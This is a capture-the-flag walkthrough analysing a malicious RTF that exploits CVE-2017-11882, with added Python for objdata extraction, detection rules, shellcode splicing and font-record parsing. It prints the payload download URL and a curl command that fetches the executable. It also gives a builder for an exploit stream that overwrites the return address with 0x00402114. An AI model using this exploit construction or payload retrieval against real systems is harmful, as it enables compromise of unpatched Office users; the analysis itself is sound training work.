CyberDefenders: Emprisa Maldoc

As a SOC analyst, you were asked to inspect a suspected document a user received in his inbox. One of your colleagues told you that he could not find anything suspicious. However, throwing the document into the sandboxing solution triggered some alerts. Your job is to investigate the document further and confirm whether it's malicious or not.

Information

Category Name: Emprisa Maldoc

Files: c39-EmprisaMaldoc.zip 1.7 KB

My Recommendations

This is my personal preference: I like being organized and deleting the folder when I'm done with it.

mkdir Documents/CyberDefenders/Emprisa && cd Documents/CyberDefenders/Emprisa

Download it from CyberDefenders and verify it with:

sha1sum /path/to/c39-EmprisaMaldoc.zip

SHA1SUM: e1c1405e3c1b6b252e5630889fa657e63c3dd5c03400dc98ff574903f1ea7dbffb6cd

Walkthrough

1.What is the CVE ID of the exploited vulnerability?

To gain information on the file, we can look up its hash in VirusTotal:

    md5sum c39-EmprisaMaldoc.rtf
    # returns d82341600606afcf027646ea42f285ae

The file is flagged by 40 security vendors, the majority associating it with CVE-2017-11882.

Answer:
CVE-2017-11882

2. To reproduce the exploit in a lab environment and mimic a corporate machine running Microsoft Office 2007, a specific patch should not be installed. Provide the patch number.


Microsoft's guidance for CVE-2017-11882 lists, for each Office version, the security update that fixes the vulnerability; the update for Office 2007 is given under Method 3. Updates are identified as KB<UpdateID>, and that KB number is the patch the lab machine must not have installed.

Answer: KB4011604

 

3. What is the magic signature in the object data?

Using rtfdump.py:

    rtfdump.py c39-EmprisaMaldoc.rtf

Item 7 is the \objdata group. rtfdump reports that it carries an embedded object with the class name Equation.3 (the Equation Editor ProgID) whose data begins with the magic d0cf11e0, the first four bytes of the OLE2 compound-file signature (D0 CF 11 E0 A1 B1 1A E1). The embedded object is therefore itself an OLE compound file.

Answer: d0cf11e0
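What rtfdump does in this step is straightforward to reproduce, and doing so makes the answer concrete: the \objdata group holds hex text, the decoded bytes are an OLE1 "EmbeddedObject" wrapper (class name, then the native data), and the first bytes of the native data are the OLE2 signature. The script below is an added example, not code from the write-up or from the oletools project; the RTF it parses is a constructed fixture with the kind of whitespace and junk control-word obfuscation found in real maldocs, and the CFB payload is a stub header only.

```python
import re
import struct

OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE2 / CFB header signature


def extract_objdata(rtf: str) -> bytes:
    """Decode the hex payload of the first \\objdata group in an RTF document.

    Control words inside the group are skipped and every non-hex character is
    dropped, because maldocs routinely pad the hex with whitespace, line breaks
    and junk control words to defeat naive parsers.
    """
    m = re.search(r"\\objdata\b", rtf)
    if not m:
        raise ValueError("no \\objdata group found")
    depth, i, chunks = 1, m.end(), []
    while i < len(rtf) and depth > 0:
        c = rtf[i]
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
        elif c == "\\":  # control word: backslash, letters, optional numeric parameter
            j = i + 1
            while j < len(rtf) and rtf[j].isalpha():
                j += 1
            while j < len(rtf) and (rtf[j].isdigit() or rtf[j] == "-"):
                j += 1
            i = j
            continue
        else:
            chunks.append(c)
        i += 1
    hexdigits = re.sub(r"[^0-9A-Fa-f]", "", "".join(chunks))
    return bytes.fromhex(hexdigits[: len(hexdigits) & ~1])  # drop a dangling nibble


def parse_ole1_object(blob: bytes) -> dict:
    """Parse the OLE1 EmbeddedObject wrapper (MS-OLEDS 2.2.5) that \\objdata carries."""
    ole_version, format_id = struct.unpack_from("<II", blob, 0)
    pos = 8
    names = []
    for _ in range(3):  # ClassName, TopicName, ItemName: 4-byte length, then ANSI bytes incl. NUL
        (n,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        names.append(blob[pos:pos + n].rstrip(b"\x00").decode("latin-1"))
        pos += n
    (native_size,) = struct.unpack_from("<I", blob, pos)
    pos += 4
    native = blob[pos:pos + native_size]
    return {
        "ole_version": ole_version,
        "format_id": format_id,          # 2 = embedded object, 1 = linked object
        "class_name": names[0],          # ProgID the host asks COM for, e.g. Equation.3
        "native_size": native_size,
        "magic": native[:4].hex(),       # what rtfdump prints as the object's magic
        "is_ole2": native[:8] == OLE2_MAGIC,
    }


def triage(rtf: str) -> dict:
    return parse_ole1_object(extract_objdata(rtf))


def build_sample_rtf() -> str:
    """Constructed fixture: an Equation.3 object whose native data is a stub CFB header."""
    class_name = b"Equation.3\x00"
    native = OLE2_MAGIC + b"\x00" * 24                       # stub; only the signature matters here
    ole1 = struct.pack("<II", 0x00000501, 2)                # OLEVersion, FormatID = embedded
    ole1 += struct.pack("<I", len(class_name)) + class_name
    ole1 += struct.pack("<II", 0, 0)                        # empty TopicName and ItemName
    ole1 += struct.pack("<I", len(native)) + native
    h = ole1.hex()
    # obfuscation as seen in the wild: line break, stray space and a junk control word inside the hex
    noisy = h[:16] + "\n" + h[16:40] + " " + h[40:70] + r"\par " + h[70:]
    return (r"{\rtf1\ansi{\object\objemb{\*\objclass Equation.3}"
            r"{\*\objdata " + noisy + "}}}")


SAMPLE_RTF = build_sample_rtf()

if __name__ == "__main__":
    print(triage(SAMPLE_RTF))
```

On the real file, feed the contents of c39-EmprisaMaldoc.rtf to triage(); the class_name and magic fields should match what rtfdump reports for item 7.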

4. What is the name of the spawned process when the document gets opened?

We can analyse the file in Any.run to see which processes are spawned in a Windows environment:

As we can see, the document is opened by WINWORD.EXE, after which the Equation Editor process EQNEDT32.EXE is spawned.

This process establishes several connections, including to a GitHub page:

It then drops an executable saved under the name 'test[1].png'. Despite the extension this is a PE file, and we can save it for further analysis.

Answer: EQNEDT32.EXE
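The process relationship above is the basis of the standard detection for this CVE. As an added example (not from the write-up), here is that logic in Python over constructed process-creation events; the field names are an assumption modelled on Sysmon Event ID 1. One caveat is built in: Equation Editor is a COM local server, so in endpoint telemetry its recorded parent is usually the DCOM launcher (svchost.exe) rather than WINWORD.EXE, even though a sandbox tree shows it under Word. The rule therefore keys on EQNEDT32.EXE itself and on anything it spawns, not on an Office parent.

```python
from pathlib import PureWindowsPath

EQNEDT = "EQNEDT32.EXE"

# Constructed process-creation events modelled on Sysmon Event ID 1 (field names are an assumption).
EVENTS = [
    {"pid": 4012, "ppid": 3100,
     "image": r"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\c39-EmprisaMaldoc.rtf"'},
    # Equation Editor is a COM local server: the recorded parent is the DCOM launcher, not WINWORD.EXE
    {"pid": 4188, "ppid": 812,
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"pid": 4260, "ppid": 4188,
     "image": r"C:\o.exe",
     "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r"C:\o.exe"},
    {"pid": 5000, "ppid": 3100,
     "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]


def basename(path: str) -> str:
    return PureWindowsPath(path).name.upper()


def detect(events: list) -> list:
    """Return one alert per suspicious event.

    Rule 1 (medium): EQNEDT32.EXE started at all. Microsoft's later updates removed
    Equation Editor from Office, and a legacy document with a genuine Equation 3.0
    object is the only benign trigger, so this is worth a look but not a conviction.
    Rule 2 (high): EQNEDT32.EXE spawning a child. Rendering an equation never needs a
    new process; in this sample the child is the downloaded payload C:\\o.exe.
    """
    alerts = []
    for e in events:
        image, parent = basename(e["image"]), basename(e["parent_image"])
        if image == EQNEDT:
            alerts.append({"pid": e["pid"], "severity": "medium",
                           "rule": "equation_editor_started", "parent": parent})
        if parent == EQNEDT:
            alerts.append({"pid": e["pid"], "severity": "high",
                           "rule": "equation_editor_spawned_child", "child": image})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The same two conditions translate directly into a SIEM query or Sigma rule; the point to carry over is that the parent field will read svchost.exe on most endpoints, so a rule that requires ParentImage to be WINWORD.EXE misses the real launch.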

 

5. What is the full path of the downloaded payload?

Using rtfobj, we can save the object and look at its strings (the hex suffix in the output file name is the offset of the object inside the RTF):

    rtfobj -s 0 c39-EmprisaMaldoc.rtf
    strings c39-EmprisaMaldoc.rtf_object_000000FE.bin

Among the strings is a fragment containing the drive letter C. This is the usual artefact of shellcode that builds a string on the stack with push instructions: each 4-byte immediate follows its 0x68 opcode byte in the same order the characters will have in memory, but the fragments are pushed from the end of the string to the start, so strings shows 4-character pieces, each prefixed by an 'h', in reverse order. Reading the pieces back, the path starts with C:\o. In question 8 we reassemble the shellcode and run it in scdbg, which shows the complete path:

Answer: C:\o.exe

6. Where is the URL used to fetch the payload?

In the previous question we saved the object. The last line of its strings output is a link to a GitHub page, consistent with Any.run's report:

    strings c39-EmprisaMaldoc.rtf_object_000000FE.bin

That last line contains the full URL of the payload:

Answer: https[://]raw[.]githubusercontent[.]com/accidentalrebel/accidentalrebel[.]com/gh-pages/theme/images/test[.]png

 

7. What is the flag inside the payload?

We can download the payload into the analysis VM with curl and then search it for the flag with strings. The file is served as .png but is the PE executable seen in the sandbox, so keep this inside the isolated VM:

    curl -O <payload URL from question 6>
    strings test.png | grep -i flag
				
			

Answer: cotizacin

8. The document contains an obfuscated shellcode. What string was used to cut the shellcode in half?

Using rtfdump.py to hexdump item 7:

    rtfdump.py -s 7 -H c39-EmprisaMaldoc.rtf

Looking into the object, we can see that the shellcode is split at ‘Equation Native’, because there is a large empty block following that string.

Answer: Equation Native

We can reconstruct the shellcode by copying the hexdump from offset 0x900 into CyberChef, deleting everything between '450071007500' (the UTF-16 start of 'Equation Native') and '6c6c51686f6e' (the first bytes of the second half), and saving the result as 'shellcode.sc'.
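The two manual steps above, cutting the filler out of the object (this question) and reading the pushed string fragments back in the right order (question 5), are easy to script, and scripting them removes the copy-and-paste errors that CyberChef invites. The code below is an added example, not part of the write-up and not the challenge object: the "shellcode" halves are hand-assembled x86 with the same push-string idiom, the filler is a constructed stand-in for the CFB directory entry that sits between them, and the cut marker is the same UTF-16 "Equ" the write-up uses. The string recovery is a linear scan, not a disassembly, so it is a heuristic that works on the usual push-built strings and can be fooled by an 0x68 inside another instruction's operand.

```python
def splice_shellcode(blob: bytes, cut_from: bytes, resume_at: bytes) -> bytes:
    """Drop the filler that separates the two halves of the shellcode.

    Everything from the first occurrence of `cut_from` up to (not including) the next
    occurrence of `resume_at` is removed; the cut marker itself is not shellcode and goes too.
    """
    start = blob.find(cut_from)
    if start < 0:
        raise ValueError("cut marker not found")
    resume = blob.find(resume_at, start + len(cut_from))
    if resume < 0:
        raise ValueError("resume marker not found after the cut marker")
    return blob[:start] + blob[resume:]


def recover_pushed_strings(code: bytes, min_pushes: int = 2) -> list:
    """Rebuild strings that shellcode assembles on the stack with consecutive pushes.

    A run of `push imm32` (68 xx xx xx xx) and `push imm8` (6a xx, sign-extended) is
    collected; because the last fragment of a string is pushed first, the run is
    reversed and joined, then cut at the first NUL. Only printable results are kept.
    """
    found, run, i = [], [], 0

    def flush():
        if len(run) >= min_pushes:
            s = b"".join(reversed(run)).split(b"\x00", 1)[0]
            if s and all(32 <= c < 127 for c in s):
                found.append(s.decode("ascii"))
        run.clear()

    while i < len(code):
        op = code[i]
        if op == 0x68 and i + 5 <= len(code):
            run.append(code[i + 1:i + 5])
            i += 5
        elif op == 0x6A and i + 2 <= len(code):
            v = code[i + 1]
            run.append(bytes([v]) + (b"\xff" if v & 0x80 else b"\x00") * 3)
            i += 2
        else:
            flush()
            i += 1
    flush()
    return found


# Constructed sample, not the challenge object. Each half is hand-assembled x86.
HEAD = (
    b"\x6a\x00"                   # push 0                 NUL terminator goes on first
    b"\x68\x2e\x65\x78\x65"       # push ".exe"
    b"\x68\x43\x3a\x5c\x6f"       # push "C:\o"            stack now holds "C:\o.exe\0"
    b"\x54"                       # push esp               pointer to the path
)
FILLER = (
    "Equation Native".encode("utf-16-le")   # CFB directory entry name that landed between the halves
    + b"\x00" * 36 + b"\x02\x00\x00\x00"    # rest of the directory entry (constructed)
)
TAIL = (
    b"\x68\x6c\x6c\x00\x00"       # push "ll\0\0"
    b"\x68\x6f\x6e\x2e\x64"       # push "on.d"
    b"\x68\x75\x72\x6c\x6d"       # push "urlm"            stack now holds "urlmon.dll\0"
    b"\x54"                       # push esp
    b"\xff\xd0"                   # call eax               (LoadLibraryA in the real payload)
)
OBJECT = HEAD + FILLER + TAIL

CUT_MARKER = "Equ".encode("utf-16-le")   # 45 00 71 00 75 00, the same start marker as in the write-up
RESUME_MARKER = TAIL[:6]                 # first bytes of the second half, read off the hexdump


def reassemble(blob: bytes) -> bytes:
    return splice_shellcode(blob, CUT_MARKER, RESUME_MARKER)


if __name__ == "__main__":
    sc = reassemble(OBJECT)
    print(len(OBJECT), "->", len(sc), "bytes;", recover_pushed_strings(sc))
```

On the real object you would read RESUME_MARKER off the hexdump exactly as the write-up does (the bytes 6c6c51686f6e) and pass the saved object file's contents in place of OBJECT; the recovered strings should then include the path from question 5 and the library name from question 11 without running anything.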

9. What function was used to download the payload file from within the shellcode?

Following the previous question, we now have the full shellcode. To see what it does, we can run it in scdbg with the options 'Unlimited steps' and 'FindSc' checked. Looking at the output, the function used to download the payload is URLDownloadToFileA:

 

Answer: URLDownloadToFileA

 

10. What function was used to execute the downloaded payload file?

After the file gets downloaded to path C:\o.exe, it is executed with the function WinExec:

Answer: WinExec

 

11. Which DLL gets loaded using the "LoadLibraryA" function?

The shellcode uses LoadLibraryA to load urlmon.dll, the library that exports URLDownloadToFileA:

Answer: urlmon.dll

 

12. What is the FONT name that gets loaded by the process to trigger the buffer overflow exploit?(3 words)

If we look again at the structure of the RTF file, the items at level 3 are the interesting ones:

    rtfdump.py c39-EmprisaMaldoc.rtf

Item 6 is essentially empty, item 7 holds the object data containing the shellcode, and item 8 holds the font name used to trigger the buffer overflow. Item 9 contains similar content.

Answer: Times New Roman

 

13. What is the GitHub link of the tool that was likely used to make this exploit?

Googling for "Times New Roman CVE-2017-11882 GitHub" takes us to this page. The RTF produced by the Python code is almost identical to our file.

14. What is the memory address written by the exploit to execute the shellcode?

Looking at the exploit's source code, the address the overflow writes in order to redirect execution to the shellcode is 0x00402114:

Answer: 0x00402114
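Questions 12 and 14 together describe the mechanism: the Equation Native stream carries an MTEF FONT record whose NUL-terminated name is copied into a fixed-size stack buffer, and the bytes past that buffer land on the saved return address. The parser below is an added example, not code from the write-up or from the exploit repository. The 28-byte EQNOLEFILEHDR and the 5-byte MTEF header are the documented layout; the buffer size (0x24) and the return-address offset (44) come from public analyses of CVE-2017-11882 and are kept as parameters to confirm against your own disassembly. Both streams are constructed: a benign one with a plain font name, and one padded so that 0x00402114 sits at the return-address slot.

```python
import struct

EQNOLEFILEHDR_LEN = 28  # WORD cbHdr, DWORD version, WORD cf, DWORD cbObject, 4 reserved DWORDs
MTEF_HDR_LEN = 5        # MTEF version, platform, product, product version, product subversion
FONT_TAG = 0x08         # MTEF FONT record: tag, typeface, style, NUL-terminated name
FONT_BUF_LEN = 0x24     # stack buffer the name is copied into (public analyses of CVE-2017-11882)
RET_OFFSET = 44         # offset of the saved return address from the buffer start (same analyses)


def parse_equation_native(stream: bytes) -> dict:
    """Parse an Equation Native stream far enough to judge its FONT record."""
    cb_hdr, version, cf, cb_object = struct.unpack_from("<HIHI", stream, 0)
    if cb_hdr != EQNOLEFILEHDR_LEN:
        raise ValueError(f"unexpected EQNOLEFILEHDR size {cb_hdr:#x}")
    mtef = stream[cb_hdr:cb_hdr + MTEF_HDR_LEN]
    records = stream[cb_hdr + MTEF_HDR_LEN:]
    info = {"mtef_version": mtef[0], "cb_object": cb_object, "font_record": False}
    tag_pos = records.find(bytes([FONT_TAG]))  # heuristic: first FONT tag, no full record walk
    if tag_pos < 0:
        return info
    name_area = records[tag_pos + 3:]           # skip tag, typeface, style
    name_len = name_area.find(b"\x00")          # the vulnerable copy loop stops at the first NUL
    if name_len < 0:
        name_len = len(name_area)
    name = name_area[:name_len]
    n_print = next((k for k, c in enumerate(name) if not 32 <= c < 127), len(name))
    info.update({
        "font_record": True,
        "typeface": records[tag_pos + 1],
        "style": records[tag_pos + 2],
        "font_name_printable": name[:n_print].decode("ascii"),
        "font_name_len": name_len,
        "overflows": name_len > FONT_BUF_LEN,
        "ret_addr": None,
    })
    if name_len >= RET_OFFSET and len(name_area) >= RET_OFFSET + 4:
        (ret,) = struct.unpack_from("<I", name_area, RET_OFFSET)
        info["ret_addr"] = f"{ret:#010x}"       # dword that lands on the saved return address
    return info


def build_stream(name_payload: bytes) -> bytes:
    """Constructed Equation Native stream: EQNOLEFILEHDR, MTEF header, FONT record."""
    mtef = b"\x03\x01\x01\x03\x0a"               # MTEF v3, Windows, Equation Editor, version 3.10
    records = (b"\x0a\x01"                        # the two bytes that precede the FONT record in public PoCs
               + bytes([FONT_TAG, 0x5a, 0x5a])    # FONT tag, typeface, style
               + name_payload + b"\x00")
    body = mtef + records
    hdr = struct.pack("<HIHI", EQNOLEFILEHDR_LEN, 0x00020000, 0xC49E, len(body)) + b"\x00" * 16
    return hdr + body                             # cf is a runtime-registered clipboard format; arbitrary here


FONT = b"Times New Roman"
BENIGN = build_stream(FONT)
EXPLOIT = build_stream(
    FONT
    + b"\x90" * (RET_OFFSET - len(FONT))          # padding up to the saved return address
    + struct.pack("<I", 0x00402114)               # the address from question 14, little-endian
)

if __name__ == "__main__":
    for label, s in (("benign", BENIGN), ("exploit", EXPLOIT)):
        print(label, parse_equation_native(s))
```

Note how the exploit's name still begins with the legitimate-looking "Times New Roman": a check that only validates the printable prefix would pass it, while the length check and the dword at RET_OFFSET expose it. To run this on the challenge sample, extract the Equation Native stream from the OLE object (olefile can do that) and pass its bytes to parse_equation_native.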

 

TLDR

– A malicious RTF file exploiting CVE-2017-11882 (the Equation Editor buffer overflow).

– Use rtfdump.py and rtfobj to analyse the file and extract its objects.

– Any.run (or another sandbox) provides the dynamic view: process tree, network connections and dropped files.

 
